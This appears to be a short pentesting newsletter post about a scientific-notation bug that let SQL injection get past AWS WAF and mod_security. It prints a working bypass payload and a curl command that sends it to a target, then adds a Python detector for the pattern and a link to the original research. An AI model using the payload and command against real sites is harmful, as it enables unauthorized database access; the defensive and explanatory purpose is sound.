Scientific Notation bug bypass AWS WAF protection

AWS WAF and the mod_security Apache module were affected by a scientific notation bug, first discovered back in 2013, that allowed an attacker to bypass the WAF and successfully exploit a SQL injection vulnerability.

Find below the payload used for the attack; note the scientific notation literal in the middle of it:

"x=1' or 1.e(1) or '1'='1"

Executing the following command made it possible to bypass the WAF's SQL injection protection and exploit a SQL injection in the underlying web application:

$ curl -i -H "Origin: http://domain" -X POST \
  "http://$DOMAIN/index.php" -d "x=1' or 1.e(1) or '1'='1"
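As an added defender-side example (not part of the original post, and not any WAF vendor's own rule), here is a small Python detector that decodes form-encoded request bodies and flags values carrying the "<digits>.e(" shape seen in the payload above, while leaving ordinary scientific notation such as 1.5e3 alone. The sample bodies are constructed for this example, and the function and pattern names are assumptions of mine.

```python
import re
from urllib.parse import parse_qs, unquote_plus

# Signature of the bypass shape shown in the post: a digit run, a trailing
# dot, the letter 'e', then an opening parenthesis, as in "1.e(1)".
# Ordinary scientific notation ("1.5e3", "2e-7") has digits after the 'e'
# and never an opening parenthesis, so it does not match.
BYPASS_PATTERN = re.compile(r"\d+\.e\s*\(", re.IGNORECASE)


def decode_form_body(raw_body: str) -> dict:
    """Decode an application/x-www-form-urlencoded body into {name: [values]}.

    Matching on the decoded value is what matters: the same payload can arrive
    raw, percent-encoded, or double-encoded, and a literal string match on the
    raw body would miss the encoded forms.
    """
    return parse_qs(raw_body, keep_blank_values=True)


def find_bypass_attempts(raw_body: str) -> list:
    """Return (parameter, decoded_value) pairs whose value carries the
    '<digits>.e(' pattern. Benign scientific notation is not reported."""
    hits = []
    for name, values in decode_form_body(raw_body).items():
        for value in values:
            # parse_qs already decoded once; decode once more so a
            # double-encoded payload is normalised before matching.
            candidate = unquote_plus(value)
            if BYPASS_PATTERN.search(candidate):
                hits.append((name, candidate))
    return hits


def scan_bodies(bodies: list) -> dict:
    """Scan a batch of request bodies (e.g. POST bodies recorded in an access
    log) and return {index: hits} for the bodies that match."""
    return {i: hits for i, body in enumerate(bodies)
            if (hits := find_bypass_attempts(body))}


# Constructed sample request bodies for this example (not real traffic).
SAMPLE_BODIES = [
    "x=1' or 1.e(1) or '1'='1",                        # payload from the post, raw
    "x=1%27%20or%201.e%281%29%20or%20%271%27%3D%271",  # same, percent-encoded
    "x=1%2527%2520or%25201.e%25281%2529",              # double-encoded fragment
    "amount=1.5e3&rate=2e-7",                          # benign scientific notation
    "x=1' or 1=1 or '1'='1",                           # classic shape, not this bypass
]

if __name__ == "__main__":
    for index, hits in scan_bodies(SAMPLE_BODIES).items():
        for name, value in hits:
            print(f"body[{index}] parameter {name!r}: {value!r}")
```

The pattern is deliberately narrow: it matches the shape of this one bypass, not SQL injection in general, so it is an extra signal for hunting through request logs rather than a replacement for a WAF rule. The lasting fix sits on the application side, where parameterized queries remove the injection regardless of how a WAF tokenizes a numeric literal.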

More info:

https://www.gosecure.net/blog/2021/10/19/a-scientific-notation-bug-in-mysql-left-aws-waf-clients-vulnerable-to-sql-injection/

Thanks for reading Learn Pentesting like a Pro! Subscribe for free to receive new posts.
